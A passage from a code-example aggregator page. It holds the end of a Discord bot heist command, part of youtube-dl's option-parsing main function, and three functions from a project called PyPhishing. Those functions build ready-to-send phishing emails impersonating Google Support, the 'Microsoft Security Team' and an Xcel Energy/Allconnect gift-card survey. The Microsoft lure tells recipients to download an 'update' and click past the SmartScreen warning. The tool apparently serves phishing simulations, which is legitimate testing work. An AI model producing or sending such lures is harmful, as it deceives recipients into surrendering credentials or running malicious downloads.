                                                       " than the starting bet of " + str(minbet))
                            elif settings["Config"]["Bankheist Started"] == "Yes":
                                await self.bot.say("You can't join a heist in progress")
                            else:
                                # Defensive fallback: state flags are inconsistent.
                                await self.bot.say("If you are seeing this, I dun fucked up.")
                        else:
                            await self.bot.say("You can't join an ongoing heist")
                else:
                    await self.bot.say("You don't have enough points to cover the minimum bet.")
            else:
                await self.bot.say("You need a bank account to place bets")
        else:
            await self.bot.say("Starting bet must at least be 50 points.")

Example 46

Project: PyPhishing
Source File: googleSupport.py
View license
def build_body(variable_dict):
    """Assemble the "Google Support" phishing email as a MIME message string.

    Args:
        variable_dict: options dict; keys read here are
            'link'       -- URL for the template ('' -> placeholder token),
            'headerfrom' -- value for the From: header ('' -> default),
            'attachment' -- path of a file to attach ('' -> no attachment).

    Returns:
        str: the serialized multipart/alternative message (plain-text part,
        HTML part, and the inline Google logo image).
    """
    # Literal token that the sending engine substitutes per recipient,
    # in the same way as the EMPADDR token embedded in the bodies below.
    # (Fix: the original passed the bare, undefined name URL_Placemarker
    # to .format(), which raised NameError at runtime.)
    URL_Placemarker = 'URL_Placemarker'

    # A date four days in the past makes the "undeliverable" notice look stale.
    d = str(datetime.datetime.today().strftime("%A, %B %d %Y"))
    delta = datetime.timedelta(days=-4)
    oldDate = (datetime.datetime.strptime(d,  "%A, %B %d %Y") + delta).strftime("%A, %B %d %Y")
    currentDate = utils.formatdate(timeval=None, localtime=True, usegmt=False)

    # NOTE(review): MaskedURL is computed for interface parity with the other
    # templates but this particular template never interpolates it.
    MaskedURL = variable_dict['link']
    if MaskedURL == '':
        MaskedURL = 'URL_Placemarker'
    sender_in_header = variable_dict['headerfrom']
    if sender_in_header == '':
        sender_in_header = '[email protected]'

    # Random 15-char id keeps the Message-ID unique across batches.
    rand_id = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(15)])
    msgid = make_msgid(rand_id)

    # Create message container - the correct MIME type is multipart/alternative.
    msg = MIMEMultipart('alternative')
    msg['From'] = sender_in_header
    msg['To'] = 'EMPADDR'
    msg['Subject'] = 'Returned email message'
    msg['Date'] = currentDate
    # Fix: header name was 'Message ID' (with a space), which is not a valid
    # RFC 5322 header field name.
    msg['Message-ID'] = msgid


    plaintextBody = '''Google Support\nEMPADDR\nLynn Bisson (Google Support) has sent you a message:\n
{0}\nUndeliverable messages.\nMore information\n_____________________________\n
This e-mail was sent to EMPADDR.\nDon't want occasional updates about Google activity? Change what email
Google Team sends you.
'''.format(oldDate)

    # {0} = stale date shown in the body, {1} = link target (placemarker token).
    htmlBody = '''<div style="background:#fff">
    <div style="max-width:700px">
        <table cellspacing="0" cellpadding="0" style="font-family:arial;font-size:13px;color:#666;border:solid 1px #f2f2f2;width:100%">
            <tr>
                <td style="background:#f7f7f7;padding:0px">
                    <table cellspacing="0" cellpadding="0" border="0">
                        <tr>
                            <td style="padding-left:10px">
                                <img src="cid:[email protected]" width="120px" height="50px" alt="">
                            <td style="font-size:18px;color:#ccc;padding-left:10px">Support
                            </td>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr>
                <td style="padding:10px">
                    <a style="color:#245dc1;font-size:18px;text-decoration:none">EMPADDR<br>
                    </a>
                    <br>
                    <span style="color:#333;font-weight:bold">Lynn Bisson
                    </span> (Google Support) has sent you a message:<br><br>
                    {0}
                    <br>
                   Undeliverable messages.<br>
                   <a style="color:#245dc1">More information
                   </a>
                </td>
            </tr>
            <tr>
                <td style="padding:10px">
                    <a href={1} style="font-family:arial;display:inline-block;padding:7px 15px;background:#5284d4;color:#fff;font-size:13px;font-weight:bold;border:solid 1px #245dc1;white-space:nowrap;text-decoration:none">View Messages
                    </a>
                </td>
            </tr>
            <tr>
                <td style="font-size:11px;padding:10px">
                   <hr noshade size="1" color="#f2f2f2">This e-mail was sent to
                    <a style="color:#245dc1;text-decoration:none">EMPADDR
                    </a>.
                     <br>Don't want occasional updates about Google activity?
                </td>
            </tr>
        </table>
    </div>
</div>

'''.format(oldDate, URL_Placemarker)

    # Optional file attachment, typed by its filename extension.
    if variable_dict['attachment'] != '':
        filename = variable_dict['attachment']
        fp = open(filename, 'rb')
        extension = filename.rsplit('.', 1)[-1]
        att = email.mime.application.MIMEApplication(fp.read(), _subtype=extension)
        fp.close()
        att.add_header('Content-Disposition', 'attachment', filename=filename)
        msg.attach(att)

    # Inline logo, referenced from the HTML via its Content-ID.
    img_location = os.getcwd() + '/SupportingFiles/images/google.png'
    img_data = open(img_location, 'rb').read()

    # Record the MIME types of both parts - text/plain and text/html.
    part1 = MIMEText(plaintextBody, 'plain')
    part2 = MIMEText(htmlBody, 'html')

    image = MIMEImage(img_data)
    image.add_header('Content-Transfer-Encoding', 'base64')
    image.add_header('Content-ID', '<[email protected]>')
    image.add_header('Content-disposition', 'inline')

    # Attach parts into message container.
    # According to RFC 2046, the last part of a multipart message, in this case
    # the HTML message, is best and preferred.
    msg.attach(part1)
    msg.attach(part2)
    msg.attach(image)

    return msg.as_string()

Example 47

View license
def build_body(variable_dict):
    """Assemble the forwarded "Microsoft Security Team" phishing email.

    Args:
        variable_dict: options dict; keys read here are
            'link'       -- URL displayed as the link text ('' -> placeholder),
            'headerfrom' -- value for the From: header ('' -> default),
            'attachment' -- path of a file to attach ('' -> no attachment).

    Returns:
        str: the serialized multipart/alternative message (plain-text part,
        HTML part, and the inline Microsoft logo image).
    """
    # Literal token that the sending engine substitutes per recipient,
    # like the EMPADDR / CLIENT NAME tokens embedded in the bodies below.
    # (Fix: the original passed the bare, undefined name URL_Placemarker
    # to .format(), which raised NameError at runtime.)
    URL_Placemarker = 'URL_Placemarker'

    # A timestamp two hours in the past for the faked "forwarded" header.
    d = str(datetime.datetime.today().strftime("%A, %B %d, %Y %I:%M%p"))
    delta = datetime.timedelta(hours=-2)
    sentDate = (datetime.datetime.strptime(d,  "%A, %B %d, %Y %I:%M%p") + delta).strftime("%A, %B %d, %Y %I:%M%p")
    currentDate = utils.formatdate(timeval=None, localtime=True, usegmt=False)

    # MaskedURL is the human-visible link text; the actual href uses the token.
    MaskedURL = variable_dict['link']
    if MaskedURL == '':
        MaskedURL = 'URL_Placemarker'

    sender_in_header = variable_dict['headerfrom']
    if sender_in_header == '':
        sender_in_header = '[email protected]'

    # Random 15-char id keeps the Message-ID unique across batches.
    rand_id = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(15)])
    msgid = make_msgid(rand_id)

    # Create message container - the correct MIME type is multipart/alternative.
    msg = MIMEMultipart('alternative')
    msg['From'] = sender_in_header
    msg['To'] = 'EMPADDR'
    msg['Subject'] = 'FW: Message from the Microsoft Security Team'
    msg['Date'] = currentDate
    # Fix: header name was 'Message ID' (with a space), which is not a valid
    # RFC 5322 header field name.
    msg['Message-ID'] = msgid

    # {0} = faked forward date, {1} = link target (placemarker token).
    plaintextBody ="""All,

Please see below about an urgent message sent from Microsoft this morning. Follow the instructions and
install the update to your systems ASAP.

1. Run the update
2. When SmartScreen pops up, click "more info" and then the "Run" button.
3. A screen may pop up, but that's normal. Everything should be updated after running.

Thanks,
CLIENT NAME

---------- Forwarded message ----------
From: Microsoft Security Team <[email protected]>
Date: {0}
Subject: Message from the Microsoft Security Team
To: CLIENT NAME <CLIENTEMAIL>

Hello,

There has been a recent virus outbreak in corporate environments that target out of date systems.
The virus corrupts and deletes all data on the affected machine and therefore can be very dangerous.

Please download and install the updates manually at the link below, as we do not want to wait to push it out in our normal patch cycle.

{1}

Thank you,
Microsoft Security Team


Note: Please DO NOT reply to this email, this is an un-managed email address. Replies will not be received.

--
    """.format(sentDate, URL_Placemarker)

    # {0} = faked forward date, {1} = href target (token), {2} = visible link text.
    htmlBody ='''
All, <br><br>

Please see below about an urgent message sent from Microsoft this morning. Follow the instructions and
install the update to your systems <b>ASAP</b>. <br><br>

1. Run the update<br>
2. When SmartScreen pops up, click "more info" and then the "Run" button.<br>
3. A screen may pop up, but that's normal. Everything should be updated after running.<br><br>

Thanks, <br>
CLIENT NAME <br><br>

---------- Forwarded message ---------- <br>
From: Microsoft Security Team <<a href="mailto:[email protected]">[email protected]</a>> <br>
Date: {0} <br>
Subject: Message from the Microsoft Security Team <br>
To: CLIENT NAME <<a href="mailto:CLIENTEMAIL">CLIENTEMAIL</a>>
<br><br>

Hello,<br>
<br>

There has been a recent virus outbreak in corporate environments that target out of date systems.<br>
The virus corrupts and deletes all data on the affected machine and therefore can be very dangerous.<br>
<br>

Please <b>download and install</b> the updates manually at the link below, as we do not want to wait to push it out in our normal patch cycle.<br>
<br>

<a href="{1}">{2}</a><br>
<br>

Thank you,<br>
Microsoft Security Team
<br>
<br>
<b>Note:</b> Please DO NOT reply to this email, this is an un-managed email address. Replies will not be received.
    '''.format(sentDate, URL_Placemarker, MaskedURL)

    # Optional file attachment, typed by its filename extension.
    if variable_dict['attachment'] != '':
        filename = variable_dict['attachment']
        fp = open(filename, 'rb')
        extension = filename.rsplit('.', 1)[-1]
        att = email.mime.application.MIMEApplication(fp.read(), _subtype=extension)
        fp.close()
        att.add_header('Content-Disposition', 'attachment', filename=filename)
        msg.attach(att)

    # Inline logo, referenced from the HTML via its Content-ID.
    img_location = os.getcwd() + '/SupportingFiles/images/microsoft.png'
    img_data = open(img_location, 'rb').read()

    # Record the MIME types of both parts - text/plain and text/html.
    part1 = MIMEText(plaintextBody, 'plain')
    part2 = MIMEText(htmlBody, 'html')

    image = MIMEImage(img_data)
    image.add_header('Content-Transfer-Encoding', 'base64')
    image.add_header('Content-ID', '<[email protected]>')
    image.add_header('Content-disposition', 'inline')

    # Attach parts into message container.
    # According to RFC 2046, the last part of a multipart message, in this case
    # the HTML message, is best and preferred.
    msg.attach(part1)
    msg.attach(part2)
    msg.attach(image)

    return msg.as_string()

Example 48

Project: PyPhishing
Source File: xcel.py
View license
def build_body(variable_dict):
    """Assemble the "Xcel Energy / ConnectSmart survey" phishing email.

    Args:
        variable_dict: options dict; keys read here are
            'link'       -- URL for the template ('' -> placeholder token),
            'headerfrom' -- value for the From: header ('' -> default),
            'attachment' -- path of a file to attach ('' -> no attachment).

    Returns:
        str: the serialized multipart/alternative message
        (plain-text part + HTML part; images are hot-linked, not inlined).
    """
    # Literal token that the sending engine substitutes per recipient,
    # like the EMPADDR token embedded in the bodies below.
    # (Fix: the original passed the bare, undefined name URL_Placemarker
    # to .format(), which raised NameError at runtime.)
    URL_Placemarker = 'URL_Placemarker'

    # NOTE(review): oldDate is computed but, after fixing the format-argument
    # bug below, is no longer interpolated anywhere in this template.
    d = str(datetime.datetime.today().strftime("%A, %B %d %Y"))
    delta = datetime.timedelta(days=-1)
    oldDate = (datetime.datetime.strptime(d,  "%A, %B %d %Y") + delta).strftime("%A, %B %d %Y")
    currentDate = utils.formatdate(timeval=None, localtime=True, usegmt=False)

    # NOTE(review): MaskedURL is computed for interface parity with the other
    # templates but this particular template never interpolates it.
    MaskedURL = variable_dict['link']
    if MaskedURL == '':
        MaskedURL = 'URL_Placemarker'

    sender_in_header = variable_dict['headerfrom']
    if sender_in_header == '':
        sender_in_header = '[email protected]'

    # Random 15-char id keeps the Message-ID unique across batches.
    rand_id = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(15)])
    msgid = make_msgid(rand_id)

    # Create message container - the correct MIME type is multipart/alternative.
    msg = MIMEMultipart('alternative')
    msg['From'] = sender_in_header
    msg['To'] = 'EMPADDR'
    msg['Subject'] = 'Please Help Xcel Energy Serve You Better'
    msg['Date'] = currentDate
    # Fix: header name was 'Message ID' (with a space), which is not a valid
    # RFC 5322 header field name.
    msg['Message-ID'] = msgid


    # Would be good to find a way to use first name here.
    # {0} and {1} are both the survey link (placemarker token).
    plaintextBody ='''
Dear EMPADDR,

[image: $50 Visa Gift Card] Thank you for speaking with ConnectSmart after
setting up your utility services. We are committed to providing the best
quality service. To better serve you, please take a moment to answer a
short survey

{0}

regarding your recent customer service experience. Your responses are very important
to us and will be kept strictly confidential.

How to get your $50

*Step 1:* Take our short survey
*Step 2:* Be automatically entered to win a $50 Visa Gift Card!


 [image: Click Here to Take this Survey]
{1}



If you have any questions please contact us at [email protected]
or call 1-800-255-2666. Thank you for your participation in this survey. We
look forward to your response.


Best regards,
Your friends at ConnectSmart
Note: This offer is presented by Allconnect Inc. and is not affiliated with
your utility provider.

Copyright 2008 Allconnect, Inc
4 Concourse PKWY, Suite 410 Atlanta, GA 30328
Allconnect respects your privacy. As an Allconnect customer, you agreed
that we may contact you via email at EMPADDR.

'''.format(URL_Placemarker, URL_Placemarker)


    # {0} and {1} are the two survey hrefs (placemarker token).
    # Fix: the original passed oldDate as the first argument, which would have
    # rendered a *date* as the href="{0}" link target.
    htmlBody = '''
<table width="663"><tbody>
    <tr>
        <td><img src="http://www.allconnect.com/25879/img/header/email_logo.gif">
        </td>
    </tr>
    <tr>
        <td>
            <p style="FONT-SIZE:20px;MARGIN-LEFT:5px">
                <font face="Arial, Helvetica, sans-serif">
                    Dear EMPADDR,<br><br>
                </font>
            </p>
            <p style="MARGIN-LEFT:5px;LINE-HEIGHT:26px">
                <font face="Arial, Helvetica, sans-serif" size="3"><img height="128
                    " alt="$50 Visa Gift Card" width="209" align="right" src="http://image.allconnect-email.com/86e7c8b3-f.jpg"> Thank you for speaking with
                    ConnectSmart after setting up your utility services. We are committed to providing
                    the best quality service. To better serve you, please take a moment to
                </font>
                <font size="3">
                    <a href="{0}" target="_blank">
                    answer a short survey
                    </a>
                </font>
                <font face="Arial, Helvetica, sans-serif" size="3">regarding your recent customer service experience.
                    Your responses are very important to us and will be kept strictly confidential.
                    <br><br>
                </font>
            </p>
            <p style="FONT-WEIGHT:bold;FONT-SIZE:32px;MARGIN-LEFT:0px;COLOR:#4d93bf">
                <font face="Arial, Helvetica, sans-serif" size="5">How to get your $50<br>
                </font>
            </p>
            <p style="MARGIN-LEFT:0px;LINE-HEIGHT:24px">
                <font face="Arial, Helvetica, sans-serif" size="3"><b>Step 1:</b> Take our short survey
                    <br><b>Step 2:</b> Be automatically entered to win a $50 Visa Gift Card!
                </font>
            </p>
            <p style="MARGIN-LEFT:0px;LINE-HEIGHT:24px">
                <font face="Arial, Helvetica, sans-serif" size="3"><br>
                </font>
                <a href="{1}" target="_blank">
                    <img height="43" alt="Click Here to Take this Survey" width="137" align="left" border="0" src="
                        http://image.allconnect-email.com/5f5637ae-8.jpg"></a></p><p style="MARGIN-LEFT:0px;LINE-HEIGHT:26px">
                        <font face="Arial, Helvetica, sans-serif" size="3">
                            <br><br>If you have any questions please contact us at
                            <a href="mailto:[email protected]" target="_blank">[email protected]
                            </a> or call
                            <a href="tel:1-800-255-2666" value="+18002454666" target="_blank">1-800-245-4666
                            </a>. Thank you for your participation in this survey. We look forward to your response.
                        </font>
            </p>
            <p style="FONT-SIZE:20px;MARGIN-LEFT:0px">
                <font face="Arial, Helvetica, sans-serif"><br>Best regards,<br>Your friends at ConnectSmart<br>
                </font>
                <font face="Arial" size="1">Note: This offer is presented by Allconnect Inc and is not affiliated with your utility provider.
                </font>
            </p>
        </td>
    </tr>
    <tr>
        <td height="20"><br>
        </td>
    </tr>
    <tr>
        <td>
            <font face="Arial" size="1">Copyright 2008 Allconnect, Inc
                <br>4 Concourse PKWY, Suite 410 Atlanta, GA 30328<br>
                Allconnect respects your
                <a href="http://www.allconnect.com/pages/privacy_policy.html" target="_blank">privacy
                </a>. As an Allconnect customer, you agreed that we may contact you via email at
                <a href="mailto:[email protected]" target="_blank">EMPADDR
                </a>.<span style="FONT-SIZE:7.5pt;FONT-FAMILY:Arial">If you no longer wish to receive emails,please select the link below:<br>
                <a href="https://www.allconnect.com/account/emailPreferences.html?=" target="_blank">https://www.allconnect.com/account/emailPreferences.html
                </a></span>
            </font>
        </td>
    </tr>
</tbody>
</table>
</center>
<br></div><br></div></div>
'''.format(URL_Placemarker, URL_Placemarker)

    # Optional file attachment, typed by its filename extension.
    if variable_dict['attachment'] != '':
        # If a document is to be attached
        filename = variable_dict['attachment']
        fp = open(filename, 'rb')
        extension = filename.rsplit('.', 1)[-1]
        att = email.mime.application.MIMEApplication(fp.read(), _subtype=extension)
        fp.close()
        att.add_header('Content-Disposition', 'attachment', filename=filename)
        msg.attach(att)

    # Record the MIME types of both parts - text/plain and text/html.
    part1 = MIMEText(plaintextBody, 'plain')
    part2 = MIMEText(htmlBody, 'html')

    # Attach parts into message container.
    # According to RFC 2046, the last part of a multipart message, in this case
    # the HTML message, is best and preferred.
    msg.attach(part1)
    msg.attach(part2)
    return msg.as_string()

Example 49

Project: youtube-dl
Source File: __init__.py
View license
def _real_main(argv=None):
    """Main entry point for the youtube-dl command line tool.

    Parses command-line options, validates and normalizes them, builds the
    list of post-processors and the YoutubeDL options dict, then runs the
    download (or one of the informational modes) and exits with the
    downloader's return code via sys.exit.

    argv -- optional list of argument strings; None means use sys.argv.
    """
    # Compatibility fixes for Windows
    if sys.platform == 'win32':
        # https://github.com/rg3/youtube-dl/issues/820
        codecs.register(lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None)

    workaround_optparse_bug9161()

    setproctitle('youtube-dl')

    parser, opts, args = parseOpts(argv)

    # Set user agent
    if opts.user_agent is not None:
        std_headers['User-Agent'] = opts.user_agent

    # Set referer
    if opts.referer is not None:
        std_headers['Referer'] = opts.referer

    # Custom HTTP headers
    if opts.headers is not None:
        for h in opts.headers:
            if ':' not in h:
                parser.error('wrong header formatting, it should be key:value, not "%s"' % h)
            key, value = h.split(':', 1)
            if opts.verbose:
                write_string('[debug] Adding header from command line option %s:%s\n' % (key, value))
            std_headers[key] = value

    # Dump user agent
    if opts.dump_user_agent:
        write_string(std_headers['User-Agent'] + '\n', out=sys.stdout)
        sys.exit(0)

    # Batch file verification
    batch_urls = []
    if opts.batchfile is not None:
        try:
            if opts.batchfile == '-':
                batchfd = sys.stdin
            else:
                batchfd = io.open(
                    compat_expanduser(opts.batchfile),
                    'r', encoding='utf-8', errors='ignore')
            batch_urls = read_batch_urls(batchfd)
            if opts.verbose:
                write_string('[debug] Batch file urls: ' + repr(batch_urls) + '\n')
        except IOError:
            sys.exit('ERROR: batch file could not be read')
    all_urls = batch_urls + args
    all_urls = [url.strip() for url in all_urls]
    _enc = preferredencoding()
    # On Python 2 argv entries may be bytes; decode them to text.
    all_urls = [url.decode(_enc, 'ignore') if isinstance(url, bytes) else url for url in all_urls]

    # Informational modes: list extractors / descriptions / TV providers, then exit.
    if opts.list_extractors:
        for ie in list_extractors(opts.age_limit):
            write_string(ie.IE_NAME + (' (CURRENTLY BROKEN)' if not ie._WORKING else '') + '\n', out=sys.stdout)
            matchedUrls = [url for url in all_urls if ie.suitable(url)]
            for mu in matchedUrls:
                write_string('  ' + mu + '\n', out=sys.stdout)
        sys.exit(0)
    if opts.list_extractor_descriptions:
        for ie in list_extractors(opts.age_limit):
            if not ie._WORKING:
                continue
            desc = getattr(ie, 'IE_DESC', ie.IE_NAME)
            if desc is False:
                continue
            if hasattr(ie, 'SEARCH_KEY'):
                _SEARCHES = ('cute kittens', 'slithering pythons', 'falling cat', 'angry poodle', 'purple fish', 'running tortoise', 'sleeping bunny', 'burping cow')
                _COUNTS = ('', '5', '10', 'all')
                desc += ' (Example: "%s%s:%s" )' % (ie.SEARCH_KEY, random.choice(_COUNTS), random.choice(_SEARCHES))
            write_string(desc + '\n', out=sys.stdout)
        sys.exit(0)
    if opts.ap_list_mso:
        table = [[mso_id, mso_info['name']] for mso_id, mso_info in MSO_INFO.items()]
        write_string('Supported TV Providers:\n' + render_table(['mso', 'mso name'], table) + '\n', out=sys.stdout)
        sys.exit(0)

    # Conflicting, missing and erroneous options
    if opts.usenetrc and (opts.username is not None or opts.password is not None):
        parser.error('using .netrc conflicts with giving username/password')
    if opts.password is not None and opts.username is None:
        parser.error('account username missing\n')
    if opts.ap_password is not None and opts.ap_username is None:
        parser.error('TV Provider account username missing\n')
    if opts.outtmpl is not None and (opts.usetitle or opts.autonumber or opts.useid):
        parser.error('using output template conflicts with using title, video ID or auto number')
    if opts.usetitle and opts.useid:
        parser.error('using title conflicts with using video ID')
    if opts.username is not None and opts.password is None:
        opts.password = compat_getpass('Type account password and press [Return]: ')
    if opts.ap_username is not None and opts.ap_password is None:
        opts.ap_password = compat_getpass('Type TV provider account password and press [Return]: ')
    # Normalize human-readable byte-size options into numeric limits.
    if opts.ratelimit is not None:
        numeric_limit = FileDownloader.parse_bytes(opts.ratelimit)
        if numeric_limit is None:
            parser.error('invalid rate limit specified')
        opts.ratelimit = numeric_limit
    if opts.min_filesize is not None:
        numeric_limit = FileDownloader.parse_bytes(opts.min_filesize)
        if numeric_limit is None:
            parser.error('invalid min_filesize specified')
        opts.min_filesize = numeric_limit
    if opts.max_filesize is not None:
        numeric_limit = FileDownloader.parse_bytes(opts.max_filesize)
        if numeric_limit is None:
            parser.error('invalid max_filesize specified')
        opts.max_filesize = numeric_limit
    if opts.sleep_interval is not None:
        if opts.sleep_interval < 0:
            parser.error('sleep interval must be positive or 0')
    if opts.max_sleep_interval is not None:
        if opts.max_sleep_interval < 0:
            parser.error('max sleep interval must be positive or 0')
        if opts.max_sleep_interval < opts.sleep_interval:
            parser.error('max sleep interval must be greater than or equal to min sleep interval')
    else:
        opts.max_sleep_interval = opts.sleep_interval
    if opts.ap_mso and opts.ap_mso not in MSO_INFO:
        parser.error('Unsupported TV Provider, use --ap-list-mso to get a list of supported TV Providers')

    # Convert a --retries style value ('inf'/'infinite' or an integer string)
    # into a number, or abort via parser.error on bad input.
    def parse_retries(retries):
        if retries in ('inf', 'infinite'):
            parsed_retries = float('inf')
        else:
            try:
                parsed_retries = int(retries)
            except (TypeError, ValueError):
                parser.error('invalid retry count specified')
        return parsed_retries
    if opts.retries is not None:
        opts.retries = parse_retries(opts.retries)
    if opts.fragment_retries is not None:
        opts.fragment_retries = parse_retries(opts.fragment_retries)
    if opts.buffersize is not None:
        numeric_buffersize = FileDownloader.parse_bytes(opts.buffersize)
        if numeric_buffersize is None:
            parser.error('invalid buffer size specified')
        opts.buffersize = numeric_buffersize
    if opts.playliststart <= 0:
        raise ValueError('Playlist start must be positive')
    if opts.playlistend not in (-1, None) and opts.playlistend < opts.playliststart:
        raise ValueError('Playlist end must be greater than playlist start')
    if opts.extractaudio:
        if opts.audioformat not in ['best', 'aac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
            parser.error('invalid audio format specified')
    if opts.audioquality:
        opts.audioquality = opts.audioquality.strip('k').strip('K')
        if not opts.audioquality.isdigit():
            parser.error('invalid audio quality specified')
    if opts.recodevideo is not None:
        if opts.recodevideo not in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
            parser.error('invalid video recode format specified')
    if opts.convertsubtitles is not None:
        if opts.convertsubtitles not in ['srt', 'vtt', 'ass']:
            parser.error('invalid subtitle format specified')

    if opts.date is not None:
        date = DateRange.day(opts.date)
    else:
        date = DateRange(opts.dateafter, opts.datebefore)

    # Do not download videos when there are audio-only formats
    if opts.extractaudio and not opts.keepvideo and opts.format is None:
        opts.format = 'bestaudio/best'

    # --all-sub automatically sets --write-sub if --write-auto-sub is not given
    # this was the old behaviour if only --all-sub was given.
    if opts.allsubtitles and not opts.writeautomaticsub:
        opts.writesubtitles = True

    # Pick the output filename template: explicit --output wins, otherwise
    # derive one from the title/id/autonumber flags, falling back to the default.
    outtmpl = ((opts.outtmpl is not None and opts.outtmpl) or
               (opts.format == '-1' and opts.usetitle and '%(title)s-%(id)s-%(format)s.%(ext)s') or
               (opts.format == '-1' and '%(id)s-%(format)s.%(ext)s') or
               (opts.usetitle and opts.autonumber and '%(autonumber)s-%(title)s-%(id)s.%(ext)s') or
               (opts.usetitle and '%(title)s-%(id)s.%(ext)s') or
               (opts.useid and '%(id)s.%(ext)s') or
               (opts.autonumber and '%(autonumber)s-%(id)s.%(ext)s') or
               DEFAULT_OUTTMPL)
    if not os.path.splitext(outtmpl)[1] and opts.extractaudio:
        parser.error('Cannot download a video and extract audio into the same'
                     ' file! Use "{0}.%(ext)s" instead of "{0}" as the output'
                     ' template'.format(outtmpl))

    any_getting = opts.geturl or opts.gettitle or opts.getid or opts.getthumbnail or opts.getdescription or opts.getfilename or opts.getformat or opts.getduration or opts.dumpjson or opts.dump_single_json
    any_printing = opts.print_json
    download_archive_fn = compat_expanduser(opts.download_archive) if opts.download_archive is not None else opts.download_archive

    # PostProcessors
    postprocessors = []
    # Add the metadata pp first, the other pps will copy it
    if opts.metafromtitle:
        postprocessors.append({
            'key': 'MetadataFromTitle',
            'titleformat': opts.metafromtitle
        })
    if opts.addmetadata:
        postprocessors.append({'key': 'FFmpegMetadata'})
    if opts.extractaudio:
        postprocessors.append({
            'key': 'FFmpegExtractAudio',
            'preferredcodec': opts.audioformat,
            'preferredquality': opts.audioquality,
            'nopostoverwrites': opts.nopostoverwrites,
        })
    if opts.recodevideo:
        postprocessors.append({
            'key': 'FFmpegVideoConvertor',
            'preferedformat': opts.recodevideo,
        })
    if opts.convertsubtitles:
        postprocessors.append({
            'key': 'FFmpegSubtitlesConvertor',
            'format': opts.convertsubtitles,
        })
    if opts.embedsubtitles:
        postprocessors.append({
            'key': 'FFmpegEmbedSubtitle',
        })
    if opts.embedthumbnail:
        already_have_thumbnail = opts.writethumbnail or opts.write_all_thumbnails
        postprocessors.append({
            'key': 'EmbedThumbnail',
            'already_have_thumbnail': already_have_thumbnail
        })
        if not already_have_thumbnail:
            opts.writethumbnail = True
    # XAttrMetadataPP should be run after post-processors that may change file
    # contents
    if opts.xattrs:
        postprocessors.append({'key': 'XAttrMetadata'})
    # Please keep ExecAfterDownload towards the bottom as it allows the user to modify the final file in any way.
    # So if the user is able to remove the file before your postprocessor runs it might cause a few problems.
    if opts.exec_cmd:
        postprocessors.append({
            'key': 'ExecAfterDownload',
            'exec_cmd': opts.exec_cmd,
        })
    external_downloader_args = None
    if opts.external_downloader_args:
        external_downloader_args = compat_shlex_split(opts.external_downloader_args)
    postprocessor_args = None
    if opts.postprocessor_args:
        postprocessor_args = compat_shlex_split(opts.postprocessor_args)
    match_filter = (
        None if opts.match_filter is None
        else match_filter_func(opts.match_filter))

    # Assemble the full options dict consumed by the YoutubeDL constructor.
    ydl_opts = {
        'usenetrc': opts.usenetrc,
        'username': opts.username,
        'password': opts.password,
        'twofactor': opts.twofactor,
        'videopassword': opts.videopassword,
        'ap_mso': opts.ap_mso,
        'ap_username': opts.ap_username,
        'ap_password': opts.ap_password,
        'quiet': (opts.quiet or any_getting or any_printing),
        'no_warnings': opts.no_warnings,
        'forceurl': opts.geturl,
        'forcetitle': opts.gettitle,
        'forceid': opts.getid,
        'forcethumbnail': opts.getthumbnail,
        'forcedescription': opts.getdescription,
        'forceduration': opts.getduration,
        'forcefilename': opts.getfilename,
        'forceformat': opts.getformat,
        'forcejson': opts.dumpjson or opts.print_json,
        'dump_single_json': opts.dump_single_json,
        'simulate': opts.simulate or any_getting,
        'skip_download': opts.skip_download,
        'format': opts.format,
        'listformats': opts.listformats,
        'outtmpl': outtmpl,
        'autonumber_size': opts.autonumber_size,
        'restrictfilenames': opts.restrictfilenames,
        'ignoreerrors': opts.ignoreerrors,
        'force_generic_extractor': opts.force_generic_extractor,
        'ratelimit': opts.ratelimit,
        'nooverwrites': opts.nooverwrites,
        'retries': opts.retries,
        'fragment_retries': opts.fragment_retries,
        'skip_unavailable_fragments': opts.skip_unavailable_fragments,
        'buffersize': opts.buffersize,
        'noresizebuffer': opts.noresizebuffer,
        'continuedl': opts.continue_dl,
        'noprogress': opts.noprogress,
        'progress_with_newline': opts.progress_with_newline,
        'playliststart': opts.playliststart,
        'playlistend': opts.playlistend,
        'playlistreverse': opts.playlist_reverse,
        'noplaylist': opts.noplaylist,
        'logtostderr': opts.outtmpl == '-',
        'consoletitle': opts.consoletitle,
        'nopart': opts.nopart,
        'updatetime': opts.updatetime,
        'writedescription': opts.writedescription,
        'writeannotations': opts.writeannotations,
        'writeinfojson': opts.writeinfojson,
        'writethumbnail': opts.writethumbnail,
        'write_all_thumbnails': opts.write_all_thumbnails,
        'writesubtitles': opts.writesubtitles,
        'writeautomaticsub': opts.writeautomaticsub,
        'allsubtitles': opts.allsubtitles,
        'listsubtitles': opts.listsubtitles,
        'subtitlesformat': opts.subtitlesformat,
        'subtitleslangs': opts.subtitleslangs,
        'matchtitle': decodeOption(opts.matchtitle),
        'rejecttitle': decodeOption(opts.rejecttitle),
        'max_downloads': opts.max_downloads,
        'prefer_free_formats': opts.prefer_free_formats,
        'verbose': opts.verbose,
        'dump_intermediate_pages': opts.dump_intermediate_pages,
        'write_pages': opts.write_pages,
        'test': opts.test,
        'keepvideo': opts.keepvideo,
        'min_filesize': opts.min_filesize,
        'max_filesize': opts.max_filesize,
        'min_views': opts.min_views,
        'max_views': opts.max_views,
        'daterange': date,
        'cachedir': opts.cachedir,
        'youtube_print_sig_code': opts.youtube_print_sig_code,
        'age_limit': opts.age_limit,
        'download_archive': download_archive_fn,
        'cookiefile': opts.cookiefile,
        'nocheckcertificate': opts.no_check_certificate,
        'prefer_insecure': opts.prefer_insecure,
        'proxy': opts.proxy,
        'socket_timeout': opts.socket_timeout,
        'bidi_workaround': opts.bidi_workaround,
        'debug_printtraffic': opts.debug_printtraffic,
        'prefer_ffmpeg': opts.prefer_ffmpeg,
        'include_ads': opts.include_ads,
        'default_search': opts.default_search,
        'youtube_include_dash_manifest': opts.youtube_include_dash_manifest,
        'encoding': opts.encoding,
        'extract_flat': opts.extract_flat,
        'mark_watched': opts.mark_watched,
        'merge_output_format': opts.merge_output_format,
        'postprocessors': postprocessors,
        'fixup': opts.fixup,
        'source_address': opts.source_address,
        'call_home': opts.call_home,
        'sleep_interval': opts.sleep_interval,
